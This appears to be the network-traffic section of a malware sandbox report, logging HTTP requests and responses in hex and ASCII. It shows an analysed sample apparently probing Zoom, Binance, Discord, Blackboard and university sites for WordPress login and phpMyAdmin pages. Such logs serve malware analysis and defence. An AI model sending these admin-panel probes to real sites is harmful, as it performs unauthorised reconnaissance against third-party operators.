                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LEiEnN7eUtSbRxUkPP9%2BrFjNBM9UuzIfTHMv2gHCK5csRln5LaqCJbDe9El1d6tRCog7WmGxR2BMdueYgG737oAF9HLCTTkYPguaBFY4WyLV8AAtrJ8v19C9jfk8Y0GA5VxCoVnrUjs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd477b786759-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 62 32 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: b2<html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.2</center></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.178936958 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                366192.168.2.662498186.113.7.20480
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.933844090 CET188OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: oferta.senasofiaplus.edu.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.122450113 CET151INHTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://oferta.senasofiaplus.edu.co/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Server: BigIP
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.400717974 CET151INHTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://oferta.senasofiaplus.edu.co/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Server: BigIP
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                367192.168.2.66267844.195.133.14580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.961585045 CET180OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.077009916 CET583INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Cache-control: no-cache="set-cookie"
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://ucv.blackboard.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74472C5F492A4B3BEA18CC7421A779A020EB9E7C4220EA26B83E4ECBCC2AD807EE6A7F0E8DA15DAD94CF1D20A18BE263D17;PATH=/;MAX-AGE=900
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 175
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.21.4.2</center></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.221062899 CET382OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74472C5F492A4B3BEA18CC7421A779A020EB9E7C4220EA26B83E4ECBCC2AD807EE6A7F0E8DA15DAD94CF1D20A18BE263D17
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://ucv.blackboard.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.336522102 CET364INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://ucv.blackboard.com/wp-admin/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 175
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.21.4.2</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                368192.168.2.662679170.114.52.480
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.961663961 CET177OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: us04web.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.084933996 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=15
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:16:22 GMT
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=1iAg.jaqOry6c7AW1l9FRRQzGRAhyUaJmOXCMdnuwVs-1707131767-1-AXN1T055F/0qPV5xho0c5Hp5aAPUnzpxyaVcvCdaYwqNFgvDA63Qh9s5qsoOO8s0XQO1pfqrAc0csWoMqMsU+Ok=; path=/; expires=Mon, 05-Feb-24 11:46:07 GMT; domain=.us04web.zoom.us; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pzltbOBqF8JXsnoSuIxq6Q7NGRv8VSvvRQDUYmzam%2FdfI6BX9U1pysWRxODqHpcxQ%2FvYvqajSs10Beljjk7pF0ijMV8Wp1r2lJ2AJx57o%2BH2q22TodC0XkofT04d7L37WA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd47d9197bd0-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 36 63 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 7f 6f e3 b8 11 fd df 9f 62 a2 02 89 0d 44 92 bd 97 6d b2 b1 ac e2 ba 9b 02 01 b6 b8 ed 6d 16 ed e2 b0 08 28 72 64 f1 42 91 2a 49 59 71 73 f9 ee 07 8a 92 2d ff 48 ae 8b 16 08 10 51 1c be 99 79 7c 33 22 9d 9c 7c f8 e9 fd dd d7 4f 37 50 d8 52 a4 a3 e4 24 0c 7f e1 39 08 0b b7 37 70 f9 2d 85 c4 4d 00 15 c4 98 45 20 55 f8 ab 01 8e 7f 06 25 18 c7 00 04 91 cb 45 80 32 fc f2 39 48 21 39 f9 05 25 e3 f9 b7 30 dc 42 75 38 00 c7 a1 2e bf 0f ea ea 15 a8 ab ef 80 5a da 0e cd bd 38 96 e5 21 4a 18 ee 22 15 48 58 3a 4a 2c b7 02 d3 1f ad 45 69 b9 92 f0 33 fe bb e6 1a d9 09 fc 06 ef 85 aa 59 2e 88 c6 24 f6 76 a3 a4 44 4b 80 16 44 1b b4 8b e0 cb dd df c2 ab 00 e2 7e a2 b0 b6 0a 1d c2 6a 11 bc 57 d2 81 86 77 eb 0a 03 a0 7e b4 08 2c 3e da d8 c5 3b df c0 bc 86 f2 af f0 cb 8f e1 7b 55 56 c4 f2 4c 0c 81 6e 6f 16 37 6c 89
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 6cbXobDmm(rdB*IYqs-HQy|3"|O7PR$97p-ME U%E29H!9%0Bu8.Z8!J"HX:J,Ei3Y.$vDKD~jWw~,>;{UVLno7l
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.084954977 CET762INData Raw: 83 75 92 94 b8 08 b4 ca 94 35 03 43 a9 b8 64 f8 78 0e 52 e5 4a 08 d5 1c 2c 59 71 6c 2a a5 ed 60 51 c3 99 2d 16 0c 57 9c 62 d8 0e ce b9 e4 96 13 11 1a 4a 04 2e 66 1e 45 70 f9 00 1a c5 22 30 76 2d d0 14 88 36 00 ce 16 01 cd ef fd ab 90 1a 13 40 a1
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: u5CdxRJ,Yql*`Q-WbJ.fEp"0v-6@1_1e2KjZx_/8]5i$zt^\^OFo648J0>d*Q8Hdxhdc7+#7%)"98jXS.Q
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.084970951 CET703INData Raw: 55 a1 89 c1 73 20 f0 f9 1f 1f 81 aa b2 24 b2 9d 28 89 e8 42 74 a4 45 49 5c a5 87 ea fa 3f 6e ab 46 a3 c4 0a 77 b6 d6 e5 47 24 dc 02 53 8e ed ce a4 cd f2 3b 37 b8 47 ef 37 d9 35 18 07 8d 25 e1 c2 53 ef b6 5b 35 4e ff 56 81 40 eb de 96 f0 20 55 d3
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Us $(BtEI\?nFwG$S;7G75%S[5NV@ U[kdbq(Td@IPWuG9H2eSxaw*rV\LA,kAgS0u/!w)Jbv(0)PFL/5Y?Lh
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.085454941 CET383OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: us04web.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: __cf_bm=1iAg.jaqOry6c7AW1l9FRRQzGRAhyUaJmOXCMdnuwVs-1707131767-1-AXN1T055F/0qPV5xho0c5Hp5aAPUnzpxyaVcvCdaYwqNFgvDA63Qh9s5qsoOO8s0XQO1pfqrAc0csWoMqMsU+Ok=
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://us04web.zoom.us/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.242592096 CET764INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 134
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://us04web.zoom.us/wp-admin/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ptaHaj6lY0ZQ2KtUu01%2BecgItKObaV7Qf7UoIw%2BzGhfcktqjFOBPAcvUh8pm3%2BS3iaHsdN4l%2FgP5vCKA4guGd6%2BP3sqtd%2FLZHlsAa%2Bw9enFZCRoOgBlltBsLaeqNxmGLZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd4899c37bd0-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                369192.168.2.6627693.161.136.280
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.977035999 CET179OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.binance.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.078733921 CET579INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.binance.com/wp-admin/
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 4b4ef7cefd8f81a1e60437d0590406b8.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P4
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: j8tJEbDLibjfVEAG1-AvQACJLF9IQgTdO0E2eKvy5cKuLQIq3dwGZw==
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                370192.168.2.66260754.71.181.16080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.979877949 CET182OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucivirtual.uci.edu.mx
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.153340101 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:21 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.153357029 CET97INData Raw: 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                371192.168.2.662860162.159.135.23280
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.027205944 CET173OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
